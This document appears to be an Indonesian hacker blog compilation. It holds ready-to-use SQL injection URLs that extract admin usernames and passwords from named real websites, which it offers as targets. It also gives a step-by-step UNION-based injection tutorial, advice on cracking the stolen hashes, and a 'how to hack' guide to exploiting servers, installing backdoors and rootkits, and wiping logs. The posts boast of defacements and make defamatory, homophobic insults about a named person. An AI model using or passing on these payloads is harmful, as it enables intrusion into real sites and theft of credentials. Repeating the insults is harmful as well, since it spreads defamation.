http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, kalau belum ada silakan download di google.

4. Selamat Mencoba. Semoga sukses




Pesan sebelum mencoba : Disini saya hanya menguraikan beberapa teknik hacking yang sering digunakan oleh pemula, seperti yang telah saya jelaskan diatas.
banyak pemula pingin hacking web atau deface, menggunakan layanan site google dan site milw0rm.
Kayaknya da cukup penjelasan singkat saya mengenai hacking. Informasi lebih lanjut anda bisa memncari di beberapa sumber yang lebih
detail membahas tentang hacking. Lagian disini saya hanya menjelaskan dengan singkat and just internet holic.
" Jangan pernah malu untuk menjadi seorang pemula "

Thanks To : Moon_Lee | Kamuiclone | Mr.C | Basix | cr4wl3r | bl4ck_3n91n3 | NightProphet | nTc | Chawanua | CyberLog | Cokiki | Funky_Sensey |
b1beh^pink | Tasya | Mr.Crossbeam | M3G4TR0N | PanTeTo | Doniskynet | d3w0 | GheMax | Exnome | S4NT4 | Atan6 | Don | D'Mack |
Mitchondiria | Shinci |


All Newbie Indonesian IT
===============================================================================================
Terimakasih untuk Ea_ngel..

aku copas untuk belajar bersama2....

dan tidak ada yang dirubah sedikitpun...

roy suryo bugil

baru tau rasa dia.....

roy suryo tu sok jago...
mentang2 nti ada pemilihan didaerahnya dia langsung sok-sokan kaya bisa n jagonya ja............

padahal dia tu hanya seorang lamer yang gak da kerjaan .... :) :)
padahal yang jago tuh yang pemeran dibelakang alias anak buahnya........
mau liat fotonya ???



menurut salah satu koran diindonesia yang disebelah roy suryo itu adalh pria gay(homoseksual)...

mank muka roy mirip kaya org gay jyga sc ......

Hacker di Berbagai Negara Rusak 10.000 Situs Israel

sungguh sanagat mengerikan hacker2 seakan-akan marah atas perbuatan israel kepada palestina .........
Sementara Israel terus memuntahkan peluru-pelurunya di Jalur Gaza, para hacker juga melakukan "perang" di dunia maya dengan cara menginfiltrasi situs-situs Israel dengan memposting video, foto-foto dan slogan-slogan yang isinya mengutuk agresi Israel.

Surat kabar Asharq al-Awsat yang terbit di London dalam laporannya menyebutkan, para hacker yang merusak situs-situs Israel itu diduga beroperasi dari Libanon, Maroko, Iran dan Turki. Sementara laporan radio Israel menyebutkan,target para hackers itu adalah situs-situs perusahaan dan lembaga pemerintahan Israel termasuk situs Departemen Pertahanan Israel dan situs Israel Discount Bank.

Salah seorang hacker yang menyebut dirinya T@ke Sn!per mengatakan, kelompoknya berhasil meng-hack lebih dari 30 situs Israel, diantaranya situs-situs pemerintah Israel termasuk situs bank-bank dan situs partai politik Israel.

Sedikitnya, ada 10.000 situs milik Israel yang berhasil dilumpuhkan oleh para hacker itu. Setiap hacker bahkan melumpuhkan sekitar 2.485 situs Israel.

Situs milik sejumlah surat kabar Israel, seperti Maariv dan Yediot aharonot, juga tak luput dari serangan para hacker. Para hacker memasang foto-foto warga Palestina yang menjadi korban keganasan Israel dan foto-foto warga Irak yang menjadi korban kekejaman penjara-penjara AS.




sumber : http://eramuslim.com/berita/dunia/hacker-di-berbagai-negara-rusak-10-000-situs-israel.htm

wew setiap hacker melumpuhkan 2000++ situs israel....wkwkwkwk

aduh....

malam malam gini ko semua hacker pada bobo ya ??
padahal gw lagi bt banget nie .......

hahaha.....

situ orang barat kena hantam juga.......
ya walaupun gw lgi bt banget dalam menghadapi kehidupan nie gw berusaha intuk menjadi yang terbaik....

nie dia situs yang kena hack






hahahaha maklum lagi belajar :)

hacker sekarang tambah ngeri ja....

ya niee mungkin peringatan ja bwt para admin website agar keamana websitenya agar dijaga dengan baik......

kalian tidak mau kan seperti ini ...
:) :P

nie siapa yang mau.....

nie teman2 yang mau sikat silahkan aja..
saya kasih korban ya.... ^_^
nie dia....

http://www.pudak-scientific.com/detail_news.php?id=-2+union+select+1,2,3,concat_ws
(0x3a,id,user_id,password)+from+user_id--

http://tali-kasih.org/detail_berita.php?id=-7+union+select+1,concat
(id,0x3a,user_id,0x3a,password),3,4,5+from%20user_admin/*

silahkan nikmati ya.......
ingat jangan rubah pass kalo dah masuk ..... ^_^

learning to Sql Injection...

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x


carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda...


salam


Quick_5ilv3r.......

situs sma kena hack.....

walaupun sekedar coba2 tapi jadi keenakan ....
nie dia situs yang kena hack.....



ya baru ngetes... ^_^

malasyia kena deface... ^_^

saya juga sebenarnya tida suka dengan negara tetangga....
teman2 hacker saya sungguh mantap ...
kami tidak akan mengasihani orang yang mau ambil kebudayaan indonesia......
nie gambar2nya......

how to hack

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

- Secara Aktif : - portscanning

- network mapping

- OS Detection

- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)

- via internet registries (informasi domain, IP Addres)

- Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….

3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare